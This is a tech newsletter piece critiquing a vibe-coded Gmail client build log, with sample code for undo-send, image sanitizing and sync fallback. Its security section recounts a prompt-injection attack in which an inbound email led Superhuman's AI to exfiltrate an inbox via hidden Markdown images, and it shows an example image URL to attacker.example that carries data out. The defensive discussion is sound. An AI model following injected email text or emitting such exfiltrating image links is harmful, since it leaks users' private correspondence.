Tossell’s Codex-built Gmail client ships agent hooks, skips the injection audit

TL;DR

Ben Tossell rebuilt a Superhuman-style Gmail client almost entirely through Codex and Factory harnesses.
The build added agent-native selectors and debug endpoints matching Google’s accessibility-tree guidance.
The log skips prompt injection, despite Superhuman’s AI being shown to exfiltrate inboxes via hidden Markdown.
Factory’s swarms can burn a monthly token allowance on a single feature, a cost Tossell glosses over.

Today’s tech slot is a single build log with two stories layered inside it. Ben Tossell rebuilt a Superhuman-style Gmail client by switching between the Codex and Factory harnesses, writing almost none of the code himself. Along the way he wired in hidden selectors and debug endpoints that line up with Google’s accessibility-tree guidance for agent compatibility. That’s the surface story: a working agent-native email client, vibe-coded.

The other story is what the writeup omits. Superhuman’s AI surface has already been demonstrated exfiltrating inboxes through hidden Markdown, and the new client widens exactly that attack surface without a security chapter to match. The token economics get the same treatment — Factory’s parallel swarms can drain a monthly allowance on one feature, and the post moves past it. The pattern worth flagging is that the harnesses now ship the agent hooks by default; the threat model still has to be added by hand.

Tossell vibe-codes a Gmail client, skips the security chapter

Source: bens-bites · published 2026-05-09

TL;DR

Ben Tossell rebuilt a Superhuman-style Gmail client by switching between the Codex and Factory harnesses, with almost no hand-typed code.
He shipped agent-native hooks — hidden selectors and debug endpoints — that line up with Google’s accessibility-tree guidance.
The build log never mentions prompt injection, despite Superhuman’s AI being shown to exfiltrate inboxes via hidden Markdown.
Factory’s swarms can burn a monthly token allowance on one feature, a cost Tossell glosses over.

The build, in one paragraph

Tossell’s third “Ben’s Builds” entry is a working email client that uses Gmail as the source of truth, runs a 20-second Cmd+Z undo-send, and was assembled almost entirely by AI coding harnesses rather than hand-typed code. Codex laid the foundation; Factory took over for UI polish; the author swapped between GPT-5.5 and Claude Opus depending on whether the task wanted obedience or taste. To kill Gmail-API lag he added a local cache, optimistic UI updates, and lazy-loaded “All Mail.” For email rendering — which he calls “a horrible little world” of MIME and tracking pixels — he reverse-engineered the Obsidian web clipper.
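The undo-send behaviour is easy to picture as a holding queue. The sketch below is not Tossell's code, which the build log does not show; it is a minimal illustration assuming the client delays the real send until a 20-second window has closed. The class name `UndoSendQueue` and its methods are hypothetical, and the clock is passed in explicitly so the logic can be tested without timers.

```python
from dataclasses import dataclass, field

UNDO_WINDOW_SECONDS = 20.0  # window length named in the build log


@dataclass
class UndoSendQueue:
    """Hypothetical holding queue: drafts wait here until the undo window closes."""

    window: float = UNDO_WINDOW_SECONDS
    _pending: dict = field(default_factory=dict)  # draft id -> release time

    def queue(self, draft_id: str, now: float) -> None:
        """User pressed send; nothing is transmitted yet."""
        self._pending[draft_id] = now + self.window

    def undo(self, draft_id: str, now: float) -> bool:
        """Cmd+Z handler: cancel only while the window is still open."""
        release_at = self._pending.get(draft_id)
        if release_at is None or now >= release_at:
            return False
        del self._pending[draft_id]
        return True

    def release_due(self, now: float) -> list:
        """Return and forget the drafts whose window has closed."""
        due = [d for d, t in self._pending.items() if now >= t]
        for d in due:
            del self._pending[d]
        return due
```

A UI loop would call `release_due(time.monotonic())` on a short tick and hand the returned draft ids to whatever function actually performs the send.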

The tooling story checks out

The Codex-vs-Factory toggle isn’t just personal preference. Factory’s Droids currently top Terminal-Bench at 63.1%, narrowly ahead of OpenAI’s Codex CLI at 60.4% ¹. With the two harnesses less than three points apart, “switch harnesses for different tasks” is a defensible workflow rather than a vibe. The Obsidian-clipper trick is also more substantial than the post implies: under the hood it’s Defuddle, a Readability replacement built around a site-specific Extractor Registry that targets sub-50ms render times ². That likely explains why the email-body cleanup feels snappy.

The agent-native instincts also land in a real conversation. Google is now telling developers to design for AI agents as a first-class audience, treating the page’s accessibility tree as the canonical machine-readable surface and floating proposals like data-agent-* attributes and .well-known/agent-manifest.json ³. Tossell’s hidden selectors and debug endpoints are an early, ad-hoc version of exactly that pattern.

The chapter that’s missing

A vibe-coded email client touching a live Gmail account is a much higher-stakes artifact than a weekend toy, and the post never reckons with that. In 2024, PromptArmor showed that Superhuman’s own AI could be hijacked by an inbound email and made to exfiltrate the user’s entire inbox through hidden Markdown image requests ⁴. That’s a professionally built product with a security team. A solo developer assembling MIME parsers and reply-all logic from Codex output inherits the same prompt-injection surface with none of the review process — and the post’s stated ethos of “cheap code, delete it if the UX feels wrong” is the wrong reflex for a feature that, if wrong, leaks ten years of correspondence.
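To make the hidden-Markdown-image channel concrete: if model output containing `![](https://attacker.example/?d=...)` is rendered, the client fetches the URL and the query string carries the data out. One common mitigation is to refuse to render images from hosts that are not explicitly trusted. The sketch below illustrates that idea only; it is not the fix any vendor shipped, the allowlist contents and function name are assumptions, and it handles inline Markdown images but not reference-style images or raw HTML `<img>` tags.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist; a real client would choose its own trusted hosts.
ALLOWED_IMAGE_HOSTS = frozenset({"mail.google.com"})

# Inline Markdown image: ![alt](url "optional title")
_MD_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)')


def neutralize_remote_images(markdown: str, allowed_hosts=ALLOWED_IMAGE_HOSTS) -> str:
    """Replace inline images from untrusted hosts with an inert text placeholder."""

    def _replace(match):
        alt, url = match.group(1), match.group(2)
        host = urlparse(url).hostname or ""
        if host in allowed_hosts:
            return match.group(0)  # trusted host: leave the image untouched
        return f"[image blocked: {alt or 'no description'}]"

    return _MD_IMAGE.sub(_replace, markdown)
```

Running this over model output before it reaches the renderer removes the automatic network request. It does nothing about the injected instructions themselves, which still need separate handling.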

There’s a quieter operational gap too. The local-cache fix glosses over the fact that Gmail’s history records are typically available for only about a week ⁵. Once a client’s stored history ID has aged out, the history endpoint answers with an HTTP 404 and the client has to full-sync from scratch. Fine for a daily user, ugly for anyone who shuts the laptop for a vacation.
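The fallback a cache-backed client needs can be sketched in a few lines. Gmail's API documentation says to perform a full sync when `history.list` answers HTTP 404 for an expired `startHistoryId`; everything else here is an assumption for illustration. `HistoryExpired`, `sync_mailbox`, and the two injected callables are hypothetical names, standing in for whatever wrapper the client puts around the real API calls.

```python
from typing import Callable, Optional


class HistoryExpired(Exception):
    """Hypothetical error the caller raises when history.list returns HTTP 404."""


def sync_mailbox(
    last_history_id: Optional[str],
    fetch_changes: Callable[[str], tuple],  # returns (changes, new_history_id)
    full_sync: Callable[[], tuple],         # returns (messages, new_history_id)
) -> tuple:
    """Try an incremental sync first; fall back to a full sync if the cursor expired.

    Returns (mode, payload, new_history_id), where mode is "incremental" or "full".
    """
    if last_history_id is not None:
        try:
            changes, new_id = fetch_changes(last_history_id)
            return ("incremental", changes, new_id)
        except HistoryExpired:
            pass  # stored cursor is too old; fall through to a full sync
    messages, new_id = full_sync()
    return ("full", messages, new_id)
```

The caller persists the returned history ID after every run, so the next launch can attempt the cheap path again.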

What to take from it

The build log reads as a craft piece; the missing chapter is what happens when an attacker emails the app.

Tossell’s stack choices are vindicated, and his agent-native hooks are arguably ahead of most consumer software. But the practitioner literature on Factory flags one practical caveat — developers report blowing entire monthly token budgets on a single complex feature when the swarm starts iterating ⁶ — and the security literature flags a much bigger one. Both belong in the next post.

Footnotes

¹ Factory.ai, Terminal-Bench announcement: https://factory.ai/news/terminal-bench

Factory’s Droids currently hold the top position with a 63.1% success rate, narrowly edging out the OpenAI Codex CLI at 60.4%

² Hoangyell, Defuddle explained: https://hoangyell.com/defuddle-explained/

Defuddle is optimized to render pages in under 50 milliseconds by utilizing a site-specific ‘Extractor Registry’ for complex domains

³ Search Engine Journal, Google guidance on building for agents: https://www.searchenginejournal.com/google-tells-developers-to-build-for-ai-agents-not-just-humans/573587/

a site’s ‘accessibility tree’—originally designed for screen readers—serves as the primary high-fidelity map for AI agents

⁴ AtomicMail, Email AI privacy analysis: https://atomicmail.io/blog/what-is-email-ai-convenience-or-privacy-risk?ref=postmake.io

Superhuman’s AI could be manipulated by a malicious incoming email to exfiltrate a user’s entire inbox contents to an external attacker via hidden Markdown image requests

⁵ msgvault.io, architecture docs: https://www.msgvault.io/architecture/overview/

history records are typically only available for one week; if a client stays offline longer, a full sync must be re-triggered

⁶ Matsuoka, Factory AI CodeDroid review: https://hyperdev.matsuoka.com/p/factory-ai-codedroid-promising-concept

developers have reported burning through entire monthly allowances on single, complex features that require multiple iterations to stabilize



Jack Sun, writing.
